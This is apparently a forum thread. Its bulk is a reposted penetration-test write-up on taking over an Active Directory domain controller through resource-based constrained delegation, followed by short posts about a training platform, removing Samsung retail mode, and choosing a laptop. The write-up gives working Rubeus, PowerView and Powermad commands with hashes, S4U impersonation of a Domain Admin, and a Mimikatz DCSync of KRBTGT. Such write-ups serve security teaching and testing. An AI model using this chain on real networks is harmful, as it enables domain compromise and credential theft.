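    self_tgs = s4u2self(tgt, "ryan.da")
    proxy_tgs = s4u2proxy(self_tgs, "cifs/MAEMODC01.maemo.local")
    print(proxy_tgs.client, proxy_tgs.service, proxy_tgs.forwardable)
    # -> ryan.da cifs/MAEMODC01.maemo.local True
    ```

    The key property the model captures is point 6: even though the S4U2Self output isn’t forwardable, the S4U2Proxy output is, which is exactly what makes the attack work.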

    One of the requirements, owning an SPN, was already satisfied thanks to the targeted kerberoasting attack performed to obtain SUSANK’s credentials. I still needed write privileges on the targeted computer, which in this case was the DC. Although I didn’t have write privileges directly, I had WriteOwner privileges with the second user mentioned in the introduction, SVCRDM.

    writeowner-1-1024x196.png Figure 8 – SVCRDM could have GenericAll privileges if the ownership of MAEMODC01 was acquired.

    An implicit GenericAll ACE is applied to the owner of an object, which provided an opportunity to obtain the required write privileges. In the next section I explain how I changed the owner of the targeted computer using Active Directory Users & Computers (ADUC) in combination with Rubeus. After that, I walk through a simulated attack scenario showing how to escalate privileges within AD in a real environment by abusing the RBCD computer object takeover primitive.

    Ticket Management with Rubeus

    Since the SVCRDM user was part of the RMTADMINS group, which could modify the owner of the DC, it was possible to make SVCRDM, or any other user I owned, the owner of the DC. Being the owner of an object would grant GenericAll privileges. However, I only had the NTLM hash for the SVCRDM user, so I chose to authenticate with Kerberos. In order to do that, I used Rubeus (thank you to Harmj0y and all the people that contributed to this project).

    To change the owner of the DC I had to use the SVCRDM account. An easy way to change the owner of an AD object is by using PowerView. Another way to apply the same change is by using ADUC remotely. ADUC allows us to manage AD objects such as users, groups and Organizational Units (OU), as well as their attributes. That means we can use it to update the owner of an object, given the required privileges. Since I couldn’t crack the hash of SVCRDM’s password, I wasn’t able to authenticate using SVCRDM’s credentials, but it was possible to request Kerberos tickets for this account using Rubeus and the hash. Later, I started ADUC remotely from my VM to change the owner of the targeted DC.
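
    For reference, the PowerView route mentioned above is a one-liner. This is a sketch under the assumption that PowerView is loaded in a session authenticated as SVCRDM (the identity names are the ones from this engagement):

    ```powershell
    # PowerView: make SVCRDM the owner of the DC computer object.
    # Requires WriteOwner on MAEMODC01$ (held via the RMTADMINS group).
    Set-DomainObjectOwner -Identity 'MAEMODC01$' -OwnerIdentity 'svcrdm'
    ```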

    It’s out of the scope of this blog to explain how Kerberos works, please refer to the Microsoft Kerberos docs for further details.

    On a VM (not domain-joined), I spawned cmd.exe as local admin using runas with the user SVCRDM. This prompt allowed me to request and import Kerberos tickets to authenticate to domain services. I ran runas with the /netonly flag to ensure the authentication is only performed when remote services are accessed. Since I had used the /netonly flag and chose to authenticate using Kerberos tickets, the password I gave runas didn’t need to be the correct one.

    runas /netonly /user:svcrdm@maemo.local cmd
    runas-1.png Figure 9 – Starting Runas with the SVCRDM domain user and a wrong password.

    In the terminal running as the SVCRDM user, I used Rubeus to request a Ticket-Granting-Ticket (TGT) for this user. The /ptt (pass-the-ticket) parameter is important to automatically add the requested ticket into the current session.

    Rubeus.exe asktgt /user:SVCRDM /rc4:a568802050cd83b8898e5fb01ddd82a6 /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local
    request-tgt-1-1024x545.png Figure 10 – Requesting a TGT for the SVCRDM user with Rubeus.

    In order to access a certain service using Kerberos, a Ticket-Granting-Service (TGS) ticket is required. By presenting the TGT, I was authorised to request a TGS to access the services I was interested in. These services were the LDAP and CIFS services on the DC. We can use Rubeus to request these two TGS tickets. First, I requested the TGS for the LDAP service:

    Rubeus.exe asktgs /ticket:[TGT_Base64] /service:ldap/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local
    ldap-tgs-1-1024x560.png Figure 11 – Using the previous TGT to obtain a TGS for the LDAP service on MAEMODC01.

    In the same way, I requested a TGS for the CIFS service of the targeted DC:

    Rubeus.exe asktgs /ticket:[TGT_Base64] /service:cifs/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local
    cifs-tgs-1-1024x607.png Figure 12 – Using the previous TGT to obtain a TGS for the CIFS service on MAEMODC01.

    The tickets were imported successfully and can be listed in the output of the klist command:

    klist-1-1024x859.png Figure 13 – The requested Kerberos tickets were imported successfully in the session.

    Literally Owning the DC

    With the Kerberos tickets imported, we can start ADUC and use it to modify the targeted Active Directory environment. As with every other program, we can start ADUC from the terminal. In order to do it, I used mmc, which requires admin privileges. This is why the prompt I used to start runas and request the Kerberos tickets required elevated privileges. Because of the SVCRDM Kerberos ticket imported in the session, we’ll be able to connect to the DC without credentials being provided. To start ADUC I typed the following command:

    mmc %SystemRoot%\system32\dsa.msc

    After running this command, ADUC gave an error saying that the machine wasn’t domain joined and the main frame was empty. No problem, just right-click the “Active Directory Users and Computers” on the left menu to choose the option “Change Domain Controller…”. There, the following window appeared:

    aduc-dc-connection-1024x553.png Figure 14 – Selecting the Directory Server on ADUC.

    After adding the targeted DC, Figure 14 shows the status as “Online” so I clicked “OK” and I was able to see all the AD objects:

    aduc-remote-1024x393.png Figure 15 – AD objects of the MAEMO domain were accessible remotely using ADUC.

    Every AD object has a tab called “Security” which includes all the ACEs that are applied to it. This tab isn’t enabled by default and it must be activated by clicking on View > Advanced Features. At this point, I was ready to take ownership of the DC. Accessing the MAEMODC01 computer properties within the Domain Controllers OU and checking the advanced button on the “Security” tab, I was able to see that the owners were the Domain Admins:

    previous-owner-1024x646.png Figure 16 – MAEMODC01 owned by the Domain Admins group.

    The user SVCRDM had the privilege to change the owner so I clicked on “Change” and selected the SVCRDM user:

    owner-changed-1024x648.png Figure 17 – MAEMODC01 owner changed to the user SVCRDM.

    If you take a close look at Figure 17, most of the buttons are disabled because of the limited permissions granted to SVCRDM. Changing the owner is the only option available.

    As I said before, ownership of an object implies GenericAll privileges. After all these actions, I wanted to make everything a bit more comfortable for me, so I added the user RONALD.MGMT with GenericAll privileges on the MAEMODC01 object for use later. The final status of the DACL for the MAEMODC01 object looked as follows:

    genericall-ronald-1024x493.png Figure 18 – User RONALD.MGMT with Full Control (GenericAll) on the MAEMODC01.

    Computer Object Takeover

    According to Elad Shamir’s blog post (that I still highly encourage you to read), one of the requirements to weaponise the S4U2Self and S4U2Proxy process with the RBCD is to have control over an SPN. I ran a targeted Kerberoast attack to take control of SUSANK so that requirement was satisfied as this user had the serviceprincipalname attribute set.

    If it isn’t possible to get control of an SPN, we can use Powermad by Kevin Robertson to abuse the default machine quota and create a new computer account which will have the serviceprincipalname attribute set by default. In the Github repository, Kevin mentioned the following:

    The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD.
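
    Should the MachineAccountQuota route be needed, Powermad’s New-MachineAccount creates the computer account without attaching an actual system. A sketch, assuming Powermad is loaded; the account name and password are arbitrary examples:

    ```powershell
    # Create a new computer account; it comes with SPNs set by default.
    $Password = ConvertTo-SecureString 'Str0ngP@ss!' -AsPlainText -Force
    New-MachineAccount -MachineAccount attacker01 -Password $Password -Domain maemo.local -DomainController MAEMODC01.maemo.local
    ```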

    Before abusing the computer object takeover primitive, some more requirements needed to be met. The GenericAll privileges I set up for RONALD.MGMT previously would allow me to write the necessary attributes of the targeted DC. This is important because I needed to add an entry for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the targeted computer (the DC) that pointed back to the SPN I controlled (SUSANK). This configuration will be abused to impersonate any user in the domain, including high privileged accounts such as the Domain Admins group members:

    domain-admins-1-1024x618.png Figure 19 – Domain Admins group members.

    The following details are important in order to abuse the DACL computer takeover:

    • The required SPN is SUSANK.
    • The targeted computer is MAEMODC01, the DC of the maemo.local domain.
    • The user RONALD.MGMT has GenericAll privileges on MAEMODC01.
    • The required tools are PowerView and Rubeus.

    I had access to a lot of systems due to the compromise of both groups RMTAdmins and MGMTAdmins. I used the privileges I had to access a domain joined Windows box. There, I loaded PowerView in memory since, in this case, an in-memory PowerShell script execution wasn’t detected.

    Harmj0y detailed how to take advantage of the previous requirements in this blog post. During the assessment, I followed his approach but did not need to create a computer account as I already owned an SPN. Harmj0y also provided a gist containing all the commands needed.

    Running PowerShell as the RONALD.MGMT user, the first things we need are the SIDs of the main domain objects involved: RONALD.MGMT and MAEMODC01.maemo.local. Although it wasn’t strictly necessary, I validated the privileges the user RONALD.MGMT had on the targeted computer to double-check the GenericAll privileges I had granted it. I used Get-DomainUser and Get-DomainObjectAcl.

    #First, we get ronald.mgmt (attacker) SID
    $TargetComputer = "MAEMODC01.maemo.local"
    $AttackerSID = Get-DomainUser ronald.mgmt -Properties objectsid | Select -Expand objectsid
    $AttackerSID
    
    #Second, we check the privileges of ronald.mgmt on MAEMODC01
    $ACE = Get-DomainObjectAcl $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID}
    $ACE
    
    #We can validate the ACE applies to ronald.mgmt
    ConvertFrom-SID $ACE.SecurityIdentifier
    1.GetSID-ACE-1024x507.png Figure 20 – Obtaining the attacker SID and validating its permissions on the targeted computer.

    The next step was to configure the msDS-AllowedToActOnBehalfOfOtherIdentity attribute for the owned SPN on the targeted computer. Using Harmj0y’s template I only needed the service account SID to prepare the array of bytes for the security descriptor that represents this attribute.

    #Now, we get the SID for our SPN user (susank)
    $ServiceAccountSID = Get-DomainUser susank -Properties objectsid | Select -Expand objectsid
    $ServiceAccountSID
    
    #Later, we prepare the raw security descriptor
    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -Argument "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ServiceAccountSID))"
    $SDBytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($SDBytes, 0)
    2.RawSecurityDescriptor-1024x156.png Figure 21 – Creating the raw security descriptor including the SPN SID for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
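
    The security descriptor above is just an SDDL string with the service account’s SID embedded in a single full-control ACE. A small Python sketch (the SID below is a made-up example; the real one comes from Get-DomainUser as shown above) illustrates how the string is assembled and how the SID can be pulled back out for verification:

    ```python
    import re

    # Hypothetical SID for the SPN account (susank).
    service_account_sid = "S-1-5-21-1004336348-1177238915-682003330-1105"

    # Same SDDL template used with PowerView: owner BUILTIN\Administrators (O:BA),
    # then a DACL (D:) with one access-allowed ACE granting the listed rights
    # to the service account SID.
    sddl = f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{service_account_sid})"

    # Verification mirrors reading the attribute back: extract the SID
    # from the ACE and compare it with the expected account.
    match = re.search(r";;;(S-1-5-[\d-]+)\)", sddl)
    print(match.group(1))
    # -> S-1-5-21-1004336348-1177238915-682003330-1105
    ```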

    Then, I added the raw security descriptor forged earlier to the DC, which was possible due to the GenericAll rights gained after taking ownership of the DC.

    # Set the raw security descriptor created before ($SDBytes)
    Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
    
    # Verify the security descriptor was added correctly
    $RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select -Expand msds-allowedtoactonbehalfofotheridentity
    $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
    $Descriptor.DiscretionaryAcl
    3.Add-RawSecurityDescriptor-1-1024x222.p Figure 22 – The raw security descriptor forged before was added to the targeted computer.

    With all the requirements fulfilled, I went back to my Windows VM. There, I spawned cmd.exe via runas /netonly using SUSANK’s compromised credentials:

    1.Runas-Susank.png Figure 23 – New CMD prompt spawned using Runas and SUSANK credentials.

    Since I didn’t have SUSANK’s hash, I used Rubeus to obtain it from the cleartext password:

    2.Password-to-hash-1024x485.png Figure 24 – Obtaining the password hashes with Rubeus.

    Elad included the S4U abuse technique in Rubeus and we can perform this attack by running a single command in order to impersonate a Domain Admin (Figure 19), in this case, RYAN.DA:

    Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:cifs/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt
    3.S4U-TGT-1024x607.png Figure 25 – S4U abuse with Rubeus. TGT request for SUSANK.
    4.S4U-S4U2Self-1024x584.png Figure 26 – S4U abuse with Rubeus. S4U2self to get a TGS for RYAN.DA.
    5.S4U-S4U2Proxy-1024x510.png Figure 27 – S4U abuse with Rubeus. S4U2Proxy to impersonate RYAN.DA and access the CIFS service on the targeted computer.

    The previous S4U abuse imported a TGS for the CIFS service due to the /ptt option in the session. A CIFS TGS can be used to remotely access the file system of the targeted system. However, in order to perform further lateral movements I chose to obtain a TGS for the LDAP service and, since the impersonated user is part of the Domain Admins group, I could use Mimikatz to run a DCSync. Replacing the previous Rubeus command to target the LDAP service can be done as follows:

    Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:ldap/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt

    Listing the tickets should show the two TGS obtained after running the S4U abuse:

    6.klist_-1024x621.png Figure 28 – CIFS and LDAP TGS for the user RYAN.DA.

    With these TGS (DA account) I was able to run Mimikatz to perform a DCSync and extract the hashes of sensitive domain users such as RYAN.DA and KRBTGT:

    1.dcsync-ryan-da-1024x643.png Figure 29 – DCSync with Mimikatz to obtain RYAN.DA hashes.
    2.dcsync-krbtgt-1024x610.png Figure 30 – DCSync with Mimikatz to obtain KRBTGT hashes.

    Since getting DA is just the beginning, the obtained hashes can be used to move laterally within the domain and find sensitive information to show the real impact of the assessment.

    Clean Up Operations

    Once the attack has been completed successfully, it doesn’t make sense to leave domain objects with configurations that aren’t needed. In fact, these changes could be a problem in the future. For this reason, I considered it important to include a cleanup section.

    • Remove the security descriptor msDS-AllowedToActOnBehalfOfOtherIdentity configured in the targeted computer.

    The security descriptor can be removed by using PowerView:

    Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
    • Clean-up the GenericAll ACE included in the targeted computer for the RONALD.MGMT user.

    Since this ACE was added using ADUC, I used the SVCRDM user to remove it there: just select the RONALD.MGMT Full Control row and delete it.

    • Replace the targeted computer owner with the Domain Admins group.

    One more time, using ADUC with the SVCRDM user, I selected the Change section to modify the owner back to the Domain Admins group.

    • Remove the serviceprincipalname attribute on SUSANK.

    Using the ActiveDirectory Powershell module, I ran the following command to remove the SPN attribute configured on SUSANK:

    Set-ADUser susank -ServicePrincipalName @{Remove="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local

    Conclusions

    In this blog post I wanted to show a simulation of a real attack scenario used to escalate privileges on an Active Directory domain. As I said in the beginning, none of this is new and the original authors did a great job with their research and the tools they released.

    Some changes could be applied using different tools to obtain the exact same results. However, the main goal of this blog post was to show different ways to reach the same result. Some of the actions performed in this blog post could be done in a much easier way by just using a single tool such as PowerView. A good example is the way I chose to modify the owner of the DC. The point here was to show that by mixing concepts such as Kerberos tickets and some command line tricks, we can use ADUC remotely without a cleartext password. Although it required more steps, using all this stuff during the assessment was worth it!

    BloodHound is a useful tool for Active Directory assessments, especially in combination with other tools such as Rubeus and PowerView. AD DACL object takeovers are easier to spot and fix or abuse, bringing new ways to elevate privileges in a domain.

    Elad’s blog post is a really useful resource full of important information on how delegation can be used and abused. With this blog post I wanted to show you that, although it’s possible that we don’t have all the requirements to perform an attack, with a certain level of privileges we can configure everything we need. As with any other technique while doing pentests, we can chain different misconfigurations to reach a goal such as Domain Admin. Although getting a DA account isn’t the goal of every pentest, it’s a good starting point to find sensitive information in the internal network of a company.

    If you find any glaring mistakes or have any further questions do not hesitate on sending an email to sergio [at] the domain of this blog.

     

    Sursa: https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/

  18. About CyberEDU Platform & Exercises

    We took on the mission to educate and train the next generation of infosec specialists with real-life hacking scenarios at different levels of difficulty, depending on your knowledge. It's a dedicated environment for practicing your offensive and defensive skills.

     

    100 exercises used in international competitions ready to be discovered

    Our experts created a large variety of challenges covering different aspects of the infosec field. All challenges are based on real life scenarios which are meant to teach students how to spot vulnerabilities and how to react in different situations.

     

    Link: https://cyberedu.ro/

  19. It might not work, but see the 10th post here: http://forum.gsmhosting.com/vbb/f453/sm-g928t-how-disable-retail-mode-2074034/

     

    Okay this is how you do it, super easy

    Download: https://apkpure.com/free-simple-fact....android?hl=en

    1. Connect phone to PC
    2. Place Simple Factory Reset.apk in the phone's storage
    3. Install Simple Factory Reset.apk
    4. Open Simple Factory Reset
    5. Click reset
    6. Wait until you see a message that says something like "not allowed to shut down"
    7. Once you see that, restart the phone (hold: volume down, volume up, power and home button)
    8. As soon as the phone goes black, boot into recovery (hold power, volume up, and home button)
    9. Let the phone reset

    Done, phone will restart and retail mode is no more.
    This works on all Samsungs; I've tested it myself on the S4, S5, S6, and S7 as well.

    I had several of these and was looking all over to figure out how to do it. The S4 and S5 were easy because all you needed was a custom recovery. It took me a while to find a way for the S6 and S7. Turns out it's easier the S6/S7 way. No need to flash any custom firmware.

  20. Quick search, 3 options:

    - https://www.emag.ro/laptop-lenovo-ideapad-s145-15iil-cu-procesor-intelr-coretm-i5-1035g4-pana-la-3-70-ghz-ice-lake-15-6-full-hd-12gb-512gb-ssd-intelr-irisr-plus-graphics-free-dos-platinum-grey-81w8003jrm/pd/DB91WGBBM/

    - https://www.emag.ro/laptop-asus-x509fa-with-processor-intelr-coretm-i7-8565u-pana-la-4-60-ghz-whiskey-lake-15-6-full-hd-8gb-512gb-ssd-intel-uhd-graphics-620-free-dos-slate-gray-x509fa-ej081/pd/DNRSNWBBM/

    - https://www.emag.ro/laptop-acer-aspire-5-a515-54g-cu-procesor-intelr-corer-i7-10510u-pana-la-4-90-ghz-comet-lake-15-6-full-hd-ips-8gb-512gb-ssd-nvidiar-geforcer-mx250-2gb-endless-black-nx-hmzex-004/pd/D075ZWBBM/

     

    All of them have a 512 GB SSD, which I'd say is necessary. One has 12 GB of RAM, but an i5 instead of an i7.

    I don't know, it depends on what other things you take into account. Brand-wise, I have or have had ASUS, Lenovo, HP, MacBook Pro (for reference) and never had any problems with any of them. The point I want to make is not to weigh the brand too heavily unless you have obvious reasons to.

    You could pick something with a dedicated graphics card, even though you don't game. For example.
